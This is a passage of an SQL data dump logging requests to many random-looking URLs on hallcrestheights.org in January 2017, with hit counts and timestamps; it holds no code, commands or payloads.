00:00:00'),(4049,'http://www.hallcrestheights.org/wbwp-k27595-bonkydh-i20162630-xjjikvf-vtzpx/bxkcw-jybtylw-osdu-ieqgwsog-xhgpi/',NULL,'','',1,0,'2017-01-09 23:20:09','0000-00-00 00:00:00'),(4050,'http://www.hallcrestheights.org/i20162632-nfrkop-dobbumgo-lzes-rkwtz-qtqb-k50589-svjcwjb-xnmyvss-sldjz/',NULL,'','',2,0,'2017-01-09 23:25:57','0000-00-00 00:00:00'),(4051,'http://www.hallcrestheights.org/i20162637-mrcqgb-eifuwg-rabtnw-yrqs-emgwko-whmemx-gkucy-bnpzkic-vejxkul-zjcjkn-k44076-tsxjlnu.htm',NULL,'','',1,0,'2017-01-09 23:28:46','0000-00-00 00:00:00'),(4052,'http://www.hallcrestheights.org/yembjv-htqqdckz-i20162632-fltz-terqb-k29689-wnsw/',NULL,'','',1,0,'2017-01-09 23:28:52','0000-00-00 00:00:00'),(4053,'http://www.hallcrestheights.org/htxwhy-i20162629-krsvsvhu-dykb-qxdos-fiet-k25049-yuaixnr-bdggsaa-rhefs-kjydmr-ujwi-mjqiaaur-ihcywncq/',NULL,'','',1,0,'2017-01-09 23:31:51','0000-00-00 00:00:00'),(4054,'http://www.hallcrestheights.org/vqjnys-pvholj-peurrt-pilu-ourxiv-lbtrhn-nmtqz-kowtsxp-i20162634-k41016-pbgrrcd-sikibk-xnpfovp.htm',NULL,'','',1,0,'2017-01-09 23:34:58','0000-00-00 00:00:00'),(4055,'http://www.hallcrestheights.org/gnfznx-vjxpal-titjsh-kyjy-ldpija-amdurt-k61716-aenpg-gwtdvlx-i20162634-tdqkunf-glqrhz-yonxfeq.htm',NULL,'','',1,0,'2017-01-09 23:38:07','0000-00-00 00:00:00'),(4056,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-cwxbdeud-kovfii-bptqu-hzxchh-k884-rmxag-i20162637-fpapuhg-fqvjdcl-bbvz.htm',NULL,'','',1,0,'2017-01-09 23:41:13','0000-00-00 00:00:00'),(4057,'http://www.hallcrestheights.org/pcscqr-ufunpk-k33626-wxpoid-eotw/tvsoar-mosmge-plalh-eliyrqi-yqfufxv-i20162637-ugowop-egtqamz-imcz.htm',NULL,'','',1,0,'2017-01-09 23:43:22','0000-00-00 00:00:00'),(4058,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp-k4980-bgrrcdsi-kibkxnpf-i20162636-ovpyay.htm',NULL,'','',1,0,'2017-01-09 23:44:18','0000-00-00 00:00:00'),(4059,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-vtzpx/bxkc-wjybtyl-i20162632-k49539-wosduie-qgwso-gxhgpi-sdht-nirmjhvz/',NULL,'','',1,0,'2017-01-09 23:47:33','0000-00-00 00:00:00'),(4060,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-vuclzup-k46380-hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq-eludpwcm-i20162636-egiapx.htm',NULL,'','',1,0,'2017-01-09 23:47:35','0000-00-00 00:00:00'),(4061,'http://www.hallcrestheights.org/i20162637-upttm-nbea-tgrb-nqcdcncx/k1434-rdhcpgzz-dllimv-yxjlt-feobke-bwivs-mqkrfbm-lkmstho.htm',NULL,'','',1,0,'2017-01-09 23:49:10','0000-00-00 00:00:00'),(4062,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh-qfhj-dyhao-i20162632-xrcjhw-uvds-vezytwlc-k35220-ycwscpua-kqnjtn.htm',NULL,'','',1,0,'2017-01-09 23:50:33','0000-00-00 00:00:00'),(4063,'http://www.hallcrestheights.org/qlbo-wciggec-eayafxr-glnik/ghhmb-k5955-bxpgesm-rcai-ztbiauwd-tvixp-i20162629-mtzhzz/',NULL,'','',1,0,'2017-01-09 23:52:08','0000-00-00 00:00:00'),(4064,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp-i20162634-bgrrcdsi-k47100-kibkxnpf-ovpyay.htm',NULL,'','',1,0,'2017-01-09 23:53:39','0000-00-00 00:00:00'),(4065,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-vuclzup-hvqa-k37020-wuoxz-i20162632-mnpzvs-gcrl-ycmczoqq-eludpwcm-egiapx.htm',NULL,'','',1,0,'2017-01-09 23:56:46','0000-00-00 00:00:00'),(4066,'http://www.hallcrestheights.org/k14520-jgletkym-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-i20162632-nplqfc-nebx-ilnvoxbd-jveebikp-tjvlxf.htm',NULL,'','',1,0,'2017-01-09 23:59:54','0000-00-00 00:00:00'),(4067,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-jaylr-lwfv-i20162633-k17489-dyruqpk-lsdefhx-dfpdf-ufpfaj-npvz-attuxdwv-peeklyzx/',NULL,'','',1,0,'2017-01-10 00:03:00','0000-00-00 00:00:00'),(4068,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-zvkecqq-neei-i20162631-aqjzl-nplqfc-nebx-ilnvoxbd-jveebikp-k49620-tjvlxf.htm',NULL,'','',1,0,'2017-01-10 00:06:10','0000-00-00 00:00:00'),(4069,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-amdu-i20162631-rtaen-k51420-pggwtd-vlxt-dqkunfgl-qrhzyonx-feqnzs.htm',NULL,'','',1,0,'2017-01-10 00:09:15','0000-00-00 00:00:00'),(4070,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-kbqx/dosfiet-yuaixnrb-i20162634-dggsaarh-efskjyd-mrujwimj-qiaau-rihc-k33707-ywncqs/',NULL,'','',1,0,'2017-01-10 00:09:30','0000-00-00 00:00:00'),(4071,'http://www.hallcrestheights.org/i20162628-htxwhy-krsvsvhu-dykb-qxdos-fiet-k48449-yuaixnr-bdggsaa-rhefs-kjydmr-ujwi-mjqiaaur-ihcywncq/',NULL,'','',2,0,'2017-01-10 00:12:21','0000-00-00 00:00:00'),(4072,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu/uhvfc-yzlsx-i20162629-xqroxae-hksk-k49455-xyxembuq/',NULL,'','',1,0,'2017-01-10 00:15:18','0000-00-00 00:00:00'),(4073,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-i20162632-pggwtd-k16320-vlxt-dqkunfgl-qrhzyonx-feqnzs.htm',NULL,'','',1,0,'2017-01-10 00:15:29','0000-00-00 00:00:00'),(4074,'http://www.hallcrestheights.org/htxw-hykrsvs-i20162630-vhudykb-qxdos/fiety-uaixnrb-dggs-aarhefsk-jydmr-ujwimj-qiaau-k6095-rihcywn/',NULL,'','',1,0,'2017-01-10 00:18:12','0000-00-00 00:00:00'),(4075,'http://www.hallcrestheights.org/k59395-htxw-hykrsvs-vhudykb/qxdos-i20162629-fiety-uaixnrb-dggs/',NULL,'','',2,0,'2017-01-10 00:21:06','0000-00-00 00:00:00'),(4076,'http://www.hallcrestheights.org/i20162628-oiyizg-olrcmwfb-snop-dgfnh-skrl-k47549-jrgfctf-zfiwxwm-akoay-osmpql-gveg-dfvgcrcb-zmqnoduu/',NULL,'','',1,0,'2017-01-10 00:21:43','0000-00-00 00:00:00'),(4077,'http://www.hallcrestheights.org/fadlajfn-lgfpc-i20162628-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-mxagfpap-uhgfqvjd-k17940-clbbvz.htm',NULL,'','',1,0,'2017-01-10 00:28:05','0000-00-00 00:00:00'),(4078,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-oqkgq-i20162632-aqyd-k59789-cptznzv-tjqoevp-caqwj-aluwty-bckb-sxbnbgnn-dorcajpp/',NULL,'','',1,0,'2017-01-10 00:31:03','0000-00-00 00:00:00'),(4079,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz-terqb-wnsw-i20162633-k19289-nsnjplp-ftrrjnc-ypjoq-wgzjev-ihsd-pacaylhy-ayzeueiz/',NULL,'','',1,0,'2017-01-10 00:34:10','0000-00-00 00:00:00'),(4080,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-k25680-pggwtd-vlxt-dqkunfgl-qrhzyonx-i20162636-feqnzs.htm',NULL,'','',1,0,'2017-01-10 00:37:18','0000-00-00 00:00:00'),(4081,'http://www.hallcrestheights.org/jgle-k12-tkymdrq-znrvm-lkswaz-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-i20162634-xbdj-veebikpt-jvlxfaye.htm',NULL,'','',1,0,'2017-01-10 00:40:24','0000-00-00 00:00:00'),(4082,'http://www.hallcrestheights.org/kzpf-k18355-fmsxklr-dedhwge/fvbbg-i20162629-zagpe-ciyyuwu-vfzt/',NULL,'','',1,0,'2017-01-10 00:44:21','0000-00-00 00:00:00'),(4083,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai-imjz-i20162633-k18389-fozgdvd-dqjvdob-knlyk-conedw-jmax-evortbzq-saxidihg/',NULL,'','',1,0,'2017-01-10 00:46:39','0000-00-00 00:00:00'),(4084,'http://www.hallcrestheights.org/lugdl-trsm/k32234-xxhy-pzqjllzo-i20162632-hnjumnte-cwfogy.htm',NULL,'','',1,0,'2017-01-10 00:47:15','0000-00-00 00:00:00'),(4085,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-dgfnh-i20162632-skrl-k38189-jrgfctf-zfiwxwm-akoay-osmpql-gveg-dfvgcrcb-zmqnoduu/',NULL,'','',1,0,'2017-01-10 00:49:45','0000-00-00 00:00:00'),(4086,'http://www.hallcrestheights.org/ixnmu-eahw-hioz-hjxbnwpg-i20162632-eyooayik-uksszq-cebaq-domytn-k59564-iholb-dentafy-mluzext-lfgg.htm',NULL,'','',1,0,'2017-01-10 00:52:52','0000-00-00 00:00:00'),(4087,'http://www.hallcrestheights.org/i20162628-jgletk-ymdrqz-nrvmlk-swaz-vkecqq-neeiaq-jzlnp-lqfcneb-k1676-xilnvox-bdjvee-bikptjv-lxfa.htm',NULL,'','',1,0,'2017-01-10 00:56:00','0000-00-00 00:00:00'),(4088,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil-uourxivl-i20162633-btrhnn-mtqzk-owtsxp-k37064-pbgrr-cdsikib-kxnpfov-pyay.htm',NULL,'','',1,0,'2017-01-10 00:59:06','0000-00-00 00:00:00'),(4089,'http://www.hallcrestheights.org/tkuyk-fjdnjj-bucyu-paja-ylrlwfv-k53057-dyruqpkl-i20162634-sdefhxdf-pdfufpf-ajnpvzat-tuxdw-vpee-klyzxq/',NULL,'','',1,0,'2017-01-10 01:02:14','0000-00-00 00:00:00'),(4090,'http://www.hallcrestheights.org/gnfznx-vjxpal-titjsh-kyjy/ldpija-amdurt-k34026-aenpg-i20162637-gwtdvlx-tdqkunf-glqrhz.htm',NULL,'','',1,0,'2017-01-10 01:10:28','0000-00-00 00:00:00'),(4091,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-fhjdyh-aoxrc-jhwuvd-i20162636-k32204-svezy-twlcycw-scpuakq-njtn.htm',NULL,'','',1,0,'2017-01-10 01:11:34','0000-00-00 00:00:00'),(4092,'http://www.hallcrestheights.org/mrcqg-beif-uwgr/abtnwyrq-i20162636-k22054-semgwkow-hmemxg-kucyb.htm',NULL,'','',1,0,'2017-01-10 01:13:26','0000-00-00 00:00:00'),(4093,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo-hnjumnte-cwfogy-wbiwy-rurfgv-i20162636-k52904-fcwqz-hribnkn-yfeebsb-jhfk.htm',NULL,'','',1,0,'2017-01-10 01:14:42','0000-00-00 00:00:00'),(4094,'http://www.hallcrestheights.org/i20162632-gnfzn-xvjx/k31634-palt-itjshkyj.htm',NULL,'','',1,0,'2017-01-10 01:16:16','0000-00-00 00:00:00'),(4095,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-umzb-saiimjz-k53957-fozgdvdd-i20162634-qjvdobkn-lykcone-dwjmaxev-ortbz-qsax-idihgn/',NULL,'','',1,0,'2017-01-10 01:17:48','0000-00-00 00:00:00'),(4096,'http://www.hallcrestheights.org/jglet-kymd-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl-qfcneb-i20162636-k11504-xilnv-oxbdjve-ebikptj-vlxf.htm',NULL,'','',1,0,'2017-01-10 01:27:11','0000-00-00 00:00:00'),(4097,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-i20162632-rdhcpgzz-dllimv-yxjlt-feobke-k21584-bwivs-mqkrfbm-lkmstho-wgwh.htm',NULL,'','',1,0,'2017-01-10 01:33:23','0000-00-00 00:00:00'),(4098,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-itjshkyj-yldpijaa-mdurta-enpgg-wtdvlx-i20162636-k41384-tdqku-nfglqrh-zyonxfe-qnzs.htm',NULL,'','',1,0,'2017-01-10 01:36:31','0000-00-00 00:00:00'),(4099,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp-zvsgcr-i20162636-k62084-lycmc-zoqqelu-dpwcmeg-iapx.htm',NULL,'','',1,0,'2017-01-10 01:39:37','0000-00-00 00:00:00'),(4100,'http://www.hallcrestheights.org/ajqxx-ucuzao-fifep-hiij-imjnjbo-k32357-gtsakbcc-i20162634-gyfmdvju-xzlekts-lshxosqq-jvfyo-ihtt-jputlg/',NULL,'','',1,0,'2017-01-10 01:42:45','0000-00-00 00:00:00'),(4101,'http://www.hallcrestheights.org/yembj-vhtqqd-ckzfl-tzte-rqbwnsw-k54857-nsnjplpf-i20162634-trrjncyp-joqwgzj-evihsdpa-caylh-yayz-eueizv/',NULL,'','',1,0,'2017-01-10 01:45:51','0000-00-00 00:00:00'),(4102,'http://www.hallcrestheights.org/i20162630-nfrkopd-obbum/golzes-k56023-rkwtzq-tqbsv/',NULL,'','',1,0,'2017-01-10 01:48:12','0000-00-00 00:00:00'),(4103,'http://www.hallcrestheights.org/i20162634-wbwpb-onkydh/xjjik-vfvt-zpxbxkc-k33107-wjybtylw/',NULL,'','',1,0,'2017-01-10 01:51:07','0000-00-00 00:00:00'),(4104,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh-xptvuhmi-i20162633-wnzkor-pvubf-gnqtpm-k16364-hprbi-kzonmtl-ajholjr-dklt.htm',NULL,'','',1,0,'2017-01-10 01:52:05','0000-00-00 00:00:00'),(4105,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde/cwxbdeu-i20162628-dkov-fiibp-k8190-tquhzx-chhr.htm',NULL,'','',1,0,'2017-01-10 01:54:00','0000-00-00 00:00:00'),(4106,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot-i20162632-wtvsoarm-osmgep-lalhe-liyrqi-k58664-yqfuf-xvugowo-pegtqam-zimc.htm',NULL,'','',1,0,'2017-01-10 01:55:15','0000-00-00 00:00:00'),(4107,'http://www.hallcrestheights.org/yemb-i20162629-jvhtqqd-ckzfltz-terqb/wnswn-snjplpf-trrj-ncypjoqw-gzjev-ihsdpa-caylh-k7355-yayzeue/',NULL,'','',1,0,'2017-01-10 01:56:55','0000-00-00 00:00:00'),(4108,'http://www.hallcrestheights.org/pcscq-rufu-i20162632-npkw-xpoideot-k59964-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf-xvugowo.htm',NULL,'','',1,0,'2017-01-10 01:58:19','0000-00-00 00:00:00'),(4109,'http://www.hallcrestheights.org/bsoa-i20162629-pazapst-asgmhcq-cmckf-rdtfk-k7805-gpvbchs-iwho-rklvzrtj-rsyoa-ayfwgd-xskmy-ukcmbqr/',NULL,'','',1,0,'2017-01-10 02:02:43','0000-00-00 00:00:00'),(4110,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-i20162633-vwgmyhde-k18564-cwxbdeud-kovfii-bptqu-hzxchh-rmxag-fpapuhg.htm',NULL,'','',1,0,'2017-01-10 02:04:33','0000-00-00 00:00:00'),(4111,'http://www.hallcrestheights.org/k45780-lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-i20162636-iwyrur-fgvf-cwqzhrib-nknyfeeb.htm',NULL,'','',1,0,'2017-01-10 02:10:47','0000-00-00 00:00:00'),(4112,'http://www.hallcrestheights.org/bsoap-k22157-azapst-asgmh-i20162635-cqcm/',NULL,'','',1,0,'2017-01-10 02:13:54','0000-00-00 00:00:00'),(4113,'http://www.hallcrestheights.org/k25080-ryvhrhmq-tyysl-lgeajanp-dmefnxh-qfhj-dyhao-i20162636-xrcjhw-uvds-vezytwlc-ycwscpua.htm',NULL,'','',1,0,'2017-01-10 02:17:02','0000-00-00 00:00:00'),(4114,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh-xptvuhmi-wnzkor-i20162632-pvubf-gnqtpm-hprbi-k60564-kzonmtl-ajholjr.htm',NULL,'','',1,0,'2017-01-10 02:20:08','0000-00-00 00:00:00'),(4115,'http://www.hallcrestheights.org/k60403-bsoapaz-apsta-sgmhcq/cmckfr-dtfkg-pvbc-i20162631-hsiwho/',NULL,'','',1,0,'2017-01-10 02:23:03','0000-00-00 00:00:00'),(4116,'http://www.hallcrestheights.org/htxw-i20162629-k5705-hykrsvs-vhudykb-qxdos/',NULL,'','',1,0,'2017-01-10 02:23:15','0000-00-00 00:00:00'),(4117,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-i20162633-oqkgq/aqyd-cptznzv-tjqoevp-caqwj-aluwty-k8439-bckb/',NULL,'','',1,0,'2017-01-10 02:25:57','0000-00-00 00:00:00'),(4118,'http://www.hallcrestheights.org/lugdlt-rsmxxh-k51266-ypzqjl-lzoh/njumnt-ecwfog-i20162634-ywbiw-yrurfgv-fcwqzhr-ibnkny-feebsbj-hfkw.htm',NULL,'','',1,0,'2017-01-10 02:28:51','0000-00-00 00:00:00'),(4119,'http://www.hallcrestheights.org/tkuy-i20162629-k7505-kfjdnjj-bucyupa-jaylr/',NULL,'','',1,0,'2017-01-10 02:29:30','0000-00-00 00:00:00'),(4120,'http://www.hallcrestheights.org/jglet-kymd-rqzn-rvmlkswa-k18264-zvkecqqn-eeiaqj-zlnpl-i20162633-qfcneb-xilnv-oxbdjve-ebikptj.htm',NULL,'','',1,0,'2017-01-10 02:32:37','0000-00-00 00:00:00'),(4121,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb-hmgz-k24780-nkoheyru-pxpudzik-i20162636-musshe.htm',NULL,'','',1,0,'2017-01-10 02:35:44','0000-00-00 00:00:00'),(4122,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-semgwko-whme-mxgku-k45480-cybnpz-kicv-ejxkulzj-cjkntsxj-i20162636-lnuuuv.htm',NULL,'','',1,0,'2017-01-10 02:38:51','0000-00-00 00:00:00'),(4123,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil-i20162632-uourxivl-btrhnn-mtqzk-owtsxp-k60464-pbgrr-cdsikib-kxnpfov-pyay.htm',NULL,'','',1,0,'2017-01-10 02:41:57','0000-00-00 00:00:00'),(4124,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-i20162633-fhjdyh-aoxrc-jhwuvd-k18164-svezy-twlcycw-scpuakq-njtn.htm',NULL,'','',1,0,'2017-01-10 02:48:12','0000-00-00 00:00:00'),(4125,'http://www.hallcrestheights.org/qlbo-i20162629-k6605-wciggec-eayafxr-glnik/',NULL,'','',1,0,'2017-01-10 02:51:19','0000-00-00 00:00:00'),(4126,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-i20162636-k24680-ejxkulzj-cjkntsxj-lnuuuv-tffcgy.htm',NULL,'','',1,0,'2017-01-10 02:57:32','0000-00-00 00:00:00'),(4127,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-gefv/bbgzagp-eciyyuwu-i20162634-vfztjigj-inamzbc-ngtfmlyr-ghdfi-pwgd-k53507-qrkbhd/',NULL,'','',1,0,'2017-01-10 02:57:53','0000-00-00 00:00:00'),(4128,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh-i20162636-k45380-prbikzon-mtlajhol-jrdklt-sqwxxu.htm',NULL,'','',1,0,'2017-01-10 03:00:39','0000-00-00 00:00:00'),(4129,'http://www.hallcrestheights.org/bsoa-k6245-pazapst-i20162630-asgmhcq-cmckf/',NULL,'','',1,0,'2017-01-10 03:03:47','0000-00-00 00:00:00'),(4130,'http://www.hallcrestheights.org/k29564-edzvd-i20162633-lqco-mnnm-mcawvbfu.htm',NULL,'','',1,0,'2017-01-10 03:06:54','0000-00-00 00:00:00'),(4131,'http://www.hallcrestheights.org/oiyi-k7145-zgolrcm-i20162630-wfbsnop-dgfnh/',NULL,'','',1,0,'2017-01-10 03:10:01','0000-00-00 00:00:00'),(4132,'http://www.hallcrestheights.org/nfrkopd-obbum-i20162630-golzes-rkwtzq-tqbsv-k36653-jcwj/',NULL,'','',1,0,'2017-01-10 03:16:15','0000-00-00 00:00:00'),(4133,'http://www.hallcrestheights.org/i20162636-k14480-ixnmueah-whioz-hjxbnwpg-eyooayi.htm',NULL,'','',1,0,'2017-01-10 03:19:21','0000-00-00 00:00:00'),(4134,'http://www.hallcrestheights.org/i20162636-k34280-jgletkym-drqzn-rvmlkswa-zvkecqq.htm',NULL,'','',1,0,'2017-01-10 03:22:28','0000-00-00 00:00:00'),(4135,'http://www.hallcrestheights.org/i20162636-k13580-pcscqruf-unpkw-xpoideot-wtvsoar.htm',NULL,'','',1,0,'2017-01-10 03:25:35','0000-00-00 00:00:00'),(4136,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-i20162633-mcawvbfu-k8764-japyvrlf.htm',NULL,'','',1,0,'2017-01-10 03:28:42','0000-00-00 00:00:00'),(4137,'http://www.hallcrestheights.org/ajqxxuc-uzaof-i20162630-ifephi-ijimjn-jbogt-k58253-sakb/',NULL,'','',1,0,'2017-01-10 03:31:49','0000-00-00 00:00:00'),(4138,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-i20162633-abtnwyrq-k29464-semgwkow.htm',NULL,'','',1,0,'2017-01-10 03:34:56','0000-00-00 00:00:00'),(4139,'http://www.hallcrestheights.org/k13480-jgletkym-i20162636-drqzn-rvmlkswa-zvkecqq-neei.htm',NULL,'','',1,0,'2017-01-10 03:38:03','0000-00-00 00:00:00'),(4140,'http://www.hallcrestheights.org/k14380-edzvdlqc-i20162636-omnnm-mcawvbfu-japyvrl-flxh.htm',NULL,'','',1,0,'2017-01-10 03:41:10','0000-00-00 00:00:00'),(4141,'http://www.hallcrestheights.org/zmkue-dtzj-k8564-ivyo-qxifgxuh-xptvuhmi-i20162633-wnzkor.htm',NULL,'','',1,0,'2017-01-10 03:44:17','0000-00-00 00:00:00'),(4142,'http://www.hallcrestheights.org/vqjny-spvh-k29264-oljp-eurrtpil-uourxivl-i20162633-btrhnn.htm',NULL,'','',1,0,'2017-01-10 03:47:25','0000-00-00 00:00:00'),(4143,'http://www.hallcrestheights.org/vqjnyspv-holjp-i20162636-k34880-eurrtpil-uourxiv-lbtr-hnnmt.htm',NULL,'','',1,0,'2017-01-10 03:50:32','0000-00-00 00:00:00'),(4144,'http://www.hallcrestheights.org/xhaj-k6645-vqlwczb-iqsosqx-oqkgq-i20162630-aqydc-ptznzvt-jqoe-vpcaqwja-luwty-bckbsx-bnbgn/',NULL,'','',1,0,'2017-01-10 03:53:38','0000-00-00 00:00:00'),(4145,'http://www.hallcrestheights.org/ajqxx-ucuzao-fifep-hiij-imjnjbo-i20162635-gtsakbcc-gyfmdvju-k21957-xzlekts-lshxosqq-jvfyo/',NULL,'','',1,0,'2017-01-10 03:56:46','0000-00-00 00:00:00'),(4146,'http://www.hallcrestheights.org/bsoapaz-apsta-sgmhcq-cmckfr-i20162630-dtfkg-pvbc-hsiwho-rklvzr-k57153-tjrsyoa-ayfwg-dxskm/',NULL,'','',1,0,'2017-01-10 03:59:52','0000-00-00 00:00:00'),(4147,'http://www.hallcrestheights.org/qlbowci-ggece-ayafxr-glnikg-i20162630-hhmbb-xpge-smrcai-ztbiau-wdtvixp-mtzhz-k36453-zwzrq/',NULL,'','',1,0,'2017-01-10 04:06:06','0000-00-00 00:00:00'),(4148,'http://www.hallcrestheights.org/kzpf-fmsxklr-dedhwge-i20162629-fvbbg-zagpe-ciyyuwu-vfzt-jigjinam-zbcng-k26805-tfmlyr-ghdfi/',NULL,'','',1,0,'2017-01-10 04:09:15','0000-00-00 00:00:00'),(4149,'http://www.hallcrestheights.org/kzpf-k50205-fmsxklr-dedhwge-i20162629-fvbbg-zagpe-ciyyuwu-vfzt-jigjinam-zbcng-tfmlyr-ghdfi/',NULL,'','',1,0,'2017-01-10 04:12:20','0000-00-00 00:00:00'),(4150,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-vtzpx-bxkc-wjybtyl-wosduie-i20162633-qgwso-gxhgpi-k8589-sdht-nirmjhvz/',NULL,'','',1,0,'2017-01-10 04:18:35','0000-00-00 00:00:00'),(4151,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-i20162629-cmckf-rdtfk-k28605-gpvbchs-iwho-rklvzrtj-rsyoa-ayfwgd-xskmy/',NULL,'','',1,0,'2017-01-10 04:21:42','0000-00-00 00:00:00'),(4152,'http://www.hallcrestheights.org/ajqx-xucuzao-fifephi-i20162629-ijimj-njbog-tsakbcc-k48945-gyfm-dvjuxzle-ktsls-hxosqq-jvfyo/',NULL,'','',1,0,'2017-01-10 04:24:48','0000-00-00 00:00:00'),(4153,'http://www.hallcrestheights.org/oiyi-zgolrcm-wfbsnop-i20162629-k29505-dgfnh-skrlj-rgfctfz-fiwx-wmakoayo-smpql-gvegdf-vgcrc/',NULL,'','',1,0,'2017-01-10 04:27:56','0000-00-00 00:00:00'),(4154,'http://www.hallcrestheights.org/nfrk-opdobbu-mgolzes-rkwtz-i20162630-qtqbs-vjcwjbx-nmyv-sssldjzn-aahjb-kwxros-k27345-holvg/',NULL,'','',1,0,'2017-01-10 04:31:03','0000-00-00 00:00:00'),(4155,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu-i20162629-uhvfc-yzlsx-xqroxae-hksk-k47505-xyxembuq-udtwq-ceyvuc-iwqws/',NULL,'','',1,0,'2017-01-10 04:34:10','0000-00-00 00:00:00'),(4156,'http://www.hallcrestheights.org/bsoapaza-psta-sgmhcqc-mckfrdtf-kgpvbchs-iwho-rklv-i20162633-zrtjr-syoa-ayfwgdx-k17841-skmyuk/',NULL,'','',1,0,'2017-01-10 04:37:16','0000-00-00 00:00:00'),(4157,'http://www.hallcrestheights.org/wbwpbonk-ydhx-jjikvfv-tzpxbxkc-wjybtylw-osdu-ieqg-i20162633-wsogx-k38541-hgpi-sdhtnir-mjhvzy/',NULL,'','',1,0,'2017-01-10 04:40:23','0000-00-00 00:00:00'),(4158,'http://www.hallcrestheights.org/kzpffmsx-klrd-edhwgef-vbbgzagp-eciyyuwu-vfzt-k39441-jigj-i20162633-inamz-bcng-tfmlyrg-hdfipw/',NULL,'','',1,0,'2017-01-10 04:43:31','0000-00-00 00:00:00'),(4159,'http://www.hallcrestheights.org/soegszxy-ifet-vtndyuu-hvfcyzls-k60141-xxqroxae-hksk-i20162632-xyxe-mbuqu-dtwq-ceyvuci-wqwsgf/',NULL,'','',1,0,'2017-01-10 04:46:37','0000-00-00 00:00:00'),(4160,'http://www.hallcrestheights.org/xhajvqlw-czbi-qsosqxo-qkgqaqyd-i20162630-cptznzvt-jqoe-vpca-k38001-qwjal-uwty-bckbsxb-nbgnnd/',NULL,'','',1,0,'2017-01-10 04:49:45','0000-00-00 00:00:00'),(4161,'http://www.hallcrestheights.org/k957-oiyiz-golrcm-wfbsn-opdg-fnhskrl-jrgfctfz-fiwxwmak-oayosmp-qlgvegdf-i20162635-vgcrc-bzmq/',NULL,'','',1,0,'2017-01-10 04:52:52','0000-00-00 00:00:00'),(4162,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-i20162631-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-k51320-ycmczoqq-eludpwcm-egiapx-mxikii.htm',NULL,'','',1,0,'2017-01-10 04:59:02','0000-00-00 00:00:00'),(4163,'http://www.hallcrestheights.org/ixnmueah-i20162635-whioz-k5900-hjxbnwpg-eyooayi-kuks-szqce.htm',NULL,'https://search.yahoo.co.jp/','',7,0,'2017-01-10 05:08:09','0000-00-00 00:00:00'),(4164,'http://www.hallcrestheights.org/i20162632-edzvd-lqco/k42434-mnnm-mcawvbfu.htm',NULL,'','',1,0,'2017-01-10 05:08:31','0000-00-00 00:00:00'),(4165,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-i20162631-dmefnxh-qfhj-dyhao-xrcjhw-uvds-k49520-vezytwlc-ycwscpua-kqnjtn-plyjup.htm',NULL,'','',1,0,'2017-01-10 05:10:54','0000-00-00 00:00:00'),(4166,'http://www.hallcrestheights.org/ajqx-i20162629-k28405-xucuzao-fifephi-ijimj-njbog-tsakbcc-gyfm-dvjuxzle-ktsls/',NULL,'','',2,0,'2017-01-10 05:11:28','0000-00-00 